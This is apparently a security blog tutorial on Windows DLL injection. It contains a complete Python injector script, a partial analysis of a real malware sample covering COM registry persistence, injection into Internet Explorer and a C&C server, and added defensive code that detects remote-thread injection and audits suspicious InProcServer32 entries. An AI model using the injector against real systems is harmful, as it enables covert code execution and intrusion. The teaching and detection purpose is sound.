Dll Injection

There are a lot of ways to alter a process's execution path, and there are many of them! In this article we'll tackle one of the most commonly used techniques, DLL injection. We'll start by looking at its concept and how to implement it yourself, then see it at work in a real malware sample. DLL injection is a very common technique in which you inject a DLL into a running binary; the injected code then runs with that process's privileges, which is useful, for example, for evading a firewall that trusts the host process.

Overall there are two types of injection, whether it's code or DLL injection: static injection is when you change the binary itself before executing it, and dynamic injection is when you change its behaviour during execution.
In dynamic DLL injection we force the binary to load the DLL by executing kernel32.LoadLibraryA in a new remote thread that we create in the target process, with the path to our DLL as its argument.

Now on to the code so you get the picture:


from ctypes import *
import os
import sys

# usage: DllInjection.py pid dll_path
# refer to MSDN if you don't know what these flags are
PAGE_READWRITE = 0x04
PROCESS_ALL_ACCESS = (0x000F0000 | 0x00100000 | 0xFFF)
VIRTUAL_MEM = (0x1000 | 0x2000)      # MEM_COMMIT | MEM_RESERVE

# load kernel32 library
kernel32 = windll.kernel32
# these calls return handles/pointers; declare that so the values are not
# truncated to 32 bits when running under a 64-bit Python
kernel32.OpenProcess.restype = c_void_p
kernel32.VirtualAllocEx.restype = c_void_p
kernel32.GetModuleHandleA.restype = c_void_p
kernel32.GetProcAddress.restype = c_void_p

if len(sys.argv) != 3:
    print("usage: DllInjection.py pid dll_path")
    sys.exit(1)
pid = int(sys.argv[1])
dll_path = sys.argv[2].encode('ascii')   # LoadLibraryA expects an ANSI string
dll_len = len(dll_path) + 1              # include the terminating NUL

# check if the dll exists
if not os.path.isfile(dll_path):
    print("Dll not found, recheck the path")
    sys.exit(1)

# open target process
h_process = kernel32.OpenProcess(PROCESS_ALL_ACCESS, False, pid)
# if failed, get out of here
if not h_process:
    print("Failed to get handle to process")
    sys.exit(1)

# allocate memory in target process to put the LoadLibraryA argument (our dll path)
arg_address = kernel32.VirtualAllocEx(
    c_void_p(h_process), None, dll_len, VIRTUAL_MEM, PAGE_READWRITE)
if not arg_address:
    print("VirtualAllocEx failed")
    sys.exit(1)

# write the argument (again, the path to our dll) into the memory we just allocated
written = c_size_t(0)
if not kernel32.WriteProcessMemory(
        c_void_p(h_process), c_void_p(arg_address), dll_path, dll_len, byref(written)):
    print("WriteProcessMemory failed")
    sys.exit(1)

# get LoadLibraryA address; kernel32 is mapped at the same base in every process
# for this boot session, so the address in our process is valid in the target too
h_kernel32 = kernel32.GetModuleHandleA(b"kernel32.dll")
h_loadlib = kernel32.GetProcAddress(c_void_p(h_kernel32), b"LoadLibraryA")

# create a new remote thread executing LoadLibraryA with the argument we wrote above
thread_id = c_ulong(0)
if not kernel32.CreateRemoteThread(
        c_void_p(h_process), None, 0, c_void_p(h_loadlib), c_void_p(arg_address),
        0, byref(thread_id)):
    print("Failed to create thread")
    sys.exit(1)
print("DLL injection success! ... Thread created with id 0x%08x" % thread_id.value)

[Screenshot: Dll1]
Pretty straightforward, right? If you want to test it, I've attached the script along with a DLL for testing.
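The script above leaves a very recognisable trace: a thread created in another process whose start address is kernel32!LoadLibraryA. Sysmon records exactly that as Event ID 8 (CreateRemoteThread) with SourceImage, TargetImage, StartModule and StartFunction fields. The following is an added example, not code from the article or its author, that parses a small set of constructed Event ID 8 records in the "Key: Value" layout and flags the ones that match the pattern; the process names, ids and addresses are made up, and the empty ALLOWED_SOURCES set is an assumed tuning point.

```python
import re

# Constructed sample of three Sysmon Event ID 8 (CreateRemoteThread) records in
# the "Key: Value" layout Event Viewer shows; the values are made up for this
# example and are not telemetry from the sample discussed in the article.
SAMPLE_EVENTS = """\
SourceProcessId: 1544
SourceImage: C:\\Windows\\explorer.exe
TargetProcessId: 3120
TargetImage: C:\\Program Files\\Internet Explorer\\iexplore.exe
StartAddress: 0x75D0E9F0
StartModule: C:\\Windows\\System32\\kernel32.dll
StartFunction: LoadLibraryA
---
SourceProcessId: 812
SourceImage: C:\\Windows\\System32\\csrss.exe
TargetProcessId: 2204
TargetImage: C:\\Users\\bob\\app.exe
StartAddress: 0x77A01234
StartModule: C:\\Windows\\System32\\ntdll.dll
StartFunction: RtlUserThreadStart
---
SourceProcessId: 4420
SourceImage: C:\\Users\\bob\\AppData\\Roaming\\svc.exe
TargetProcessId: 3120
TargetImage: C:\\Program Files\\Internet Explorer\\iexplore.exe
StartAddress: 0x00A31000
StartModule:
StartFunction:
"""

# Start routines a LoadLibrary-style injector points the remote thread at.
LOADLIB_RE = re.compile(r"^LoadLibrary(A|W|ExA|ExW)$")

# Images that legitimately create threads in other processes on this host
# (an EDR or AV agent, for instance). Assumption: empty, i.e. nothing is trusted.
ALLOWED_SOURCES = set()


def parse_events(text):
    """Split the text dump into one dict of fields per event."""
    events = []
    for chunk in text.split("---"):
        fields = {}
        for line in chunk.strip().splitlines():
            key, _, value = line.partition(":")
            fields[key.strip()] = value.strip()
        if fields:
            events.append(fields)
    return events


def classify(ev):
    """Return a short reason if the event looks like injection, else None."""
    if ev.get("SourceImage", "").lower() in ALLOWED_SOURCES:
        return None
    if ev.get("SourceProcessId") == ev.get("TargetProcessId"):
        return None                       # not a cross-process thread
    func = ev.get("StartFunction", "")
    module = ev.get("StartModule", "")
    if LOADLIB_RE.match(func):
        return "remote thread starts at %s: classic DLL injection" % func
    if not module:
        return "remote thread starts outside any loaded module: likely injected code"
    return None


def find_injections(text):
    """Return (source, target, reason) for every suspicious event in the dump."""
    hits = []
    for ev in parse_events(text):
        reason = classify(ev)
        if reason:
            hits.append((ev["SourceImage"], ev["TargetImage"], reason))
    return hits


if __name__ == "__main__":
    for src, dst, why in find_injections(SAMPLE_EVENTS):
        print("%s -> %s: %s" % (src, dst, why))
```

The second rule (a start address that resolves to no module) covers the sibling technique of writing code rather than a path into the target, which Sysmon reports with empty StartModule/StartFunction fields. Expect a few legitimate hits from security products and accessibility tools, which is what ALLOWED_SOURCES is for.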

Now that you get the concept, let's take a look at DLL injection in action.
MD5 : E276F2C49D194DEF764A383482ECBD03
https://www.virustotal.com/en/file/c3636cd797f46f55e96cadeedf593663c0ebe2bc5cc1dabef6d1e62b5f6911c3/analysis/

The point of the article is not to do a full analysis, so I'll skip a lot of details and focus mainly on the DLL injection part.
[Screenshot: Dll2]
Just to put you in the picture: in the first stage the malware creates three files, shell32.dll, 123.dll and 123.info.

It writes the path to the binary into 123.info, then copies some data into shell32.dll, and edits the registry by writing the value shell32.dll to it so that the file gets loaded on system boot through InProcServer32.

So you can conclude that a system reboot comes next, so that shell32.dll comes to life!
[Screenshot: Dll3]
And that ends the second stage. That leaves us with shell32.dll to analyze: once it gets loaded in explorer.exe, the DLL injects itself into iexplorer.exe.
[Screenshots: Dll4, Dll5]
This looks familiar, right? Once the remote thread in iexplorer.exe executes, the malicious activity starts.
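The persistence trick described above, a COM InProcServer32 registration that points at a DLL borrowing a system name (shell32.dll) from a non-system directory, is cheap to audit. The block below is an added example, not the article's or the malware author's code: it checks a list of (CLSID, InProcServer32 default value) pairs and flags registrations whose file name is a well-known system DLL but whose path is either outside %SystemRoot%\System32 or a bare file name resolved through the DLL search order. The CLSIDs and paths in SAMPLE_ENTRIES are constructed, and the short SYSTEM_DLL_NAMES list is an assumed starting point; on a Windows host collect_from_registry() enumerates the real HKCR\CLSID tree instead.

```python
import os
import re

# Well-known system DLL names a malicious COM registration may borrow so the
# entry looks legitimate at a glance (assumed starting list; extend as needed).
SYSTEM_DLL_NAMES = {"shell32.dll", "kernel32.dll", "ntdll.dll", "user32.dll",
                    "advapi32.dll", "ole32.dll", "comctl32.dll"}

# Constructed (CLSID, InProcServer32 default value) pairs; both the CLSIDs and
# the paths are made up for this example.
SAMPLE_ENTRIES = [
    ("{00000001-0000-0000-0000-000000000001}", r"C:\Windows\System32\shell32.dll"),
    ("{00000002-0000-0000-0000-000000000002}", r"%SystemRoot%\System32\ole32.dll"),
    ("{00000003-0000-0000-0000-000000000003}", r"C:\Users\bob\AppData\Roaming\shell32.dll"),
    ("{00000004-0000-0000-0000-000000000004}", "shell32.dll"),
    ("{00000005-0000-0000-0000-000000000005}", r"C:\Program Files\Vendor\vendor.dll"),
]


def _norm(path):
    """Normalise a Windows path for comparison: forward slashes, lower case."""
    return path.replace("\\", "/").rstrip("/").lower()


def _expand(path, env):
    """Expand %VAR% references case-insensitively from the given env dict."""
    return re.sub(r"%(\w+)%",
                  lambda m: env.get(m.group(1).lower(), m.group(0)), path)


def audit_inproc_servers(entries, system_dir=r"C:\Windows\System32", env=None):
    """Return (clsid, path, reason) for registrations that deserve a look."""
    env = env or {"systemroot": r"C:\Windows"}
    findings = []
    for clsid, raw in entries:
        path = _expand(raw.strip().strip('"'), env)
        name = os.path.basename(_norm(path))
        if name not in SYSTEM_DLL_NAMES:
            continue                      # only system-looking names are of interest here
        directory = os.path.dirname(_norm(path))
        if not directory:
            findings.append((clsid, raw, "bare system DLL name, resolved via the DLL search order"))
        elif directory != _norm(system_dir):
            findings.append((clsid, raw, "system DLL name outside %s" % system_dir))
    return findings


def collect_from_registry():
    """Enumerate HKCR\\CLSID\\*\\InProcServer32 on a Windows host; [] elsewhere."""
    try:
        import winreg
    except ImportError:
        return []
    entries = []
    with winreg.OpenKey(winreg.HKEY_CLASSES_ROOT, "CLSID") as clsid_key:
        i = 0
        while True:
            try:
                clsid = winreg.EnumKey(clsid_key, i)
            except OSError:
                break
            i += 1
            try:
                entries.append((clsid, winreg.QueryValue(clsid_key, clsid + r"\InProcServer32")))
            except OSError:
                pass                      # this CLSID has no in-process server
    return entries


if __name__ == "__main__":
    env = {"systemroot": os.environ.get("SystemRoot", r"C:\Windows")}
    for clsid, path, why in audit_inproc_servers(collect_from_registry() or SAMPLE_ENTRIES, env=env):
        print("%s -> %s: %s" % (clsid, path, why))
```

A reboot-and-see approach, as the article describes, is how the sample itself relies on this key; comparing a registry snapshot taken before and after a suspect binary runs against this audit is the defender's mirror of that step.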
[Screenshot: Dll6]
The thread uses the send and recv functions from WS2_32.dll to communicate with the C&C at 209.160.21.76. The data received is saved on disk as 123.dll and 123.complite; lastly it closes the socket and creates a new thread executing 123.dll, which is probably a backdoor.
[Screenshot: Dll7]
I chose not to go any further because the point of the article was to show you the concept of DLL injection in a real-life scenario. I may continue the analysis in a later article; until then, good luck!

Menna Essa

Code/Binaries – Archive
pass: ruinedsec
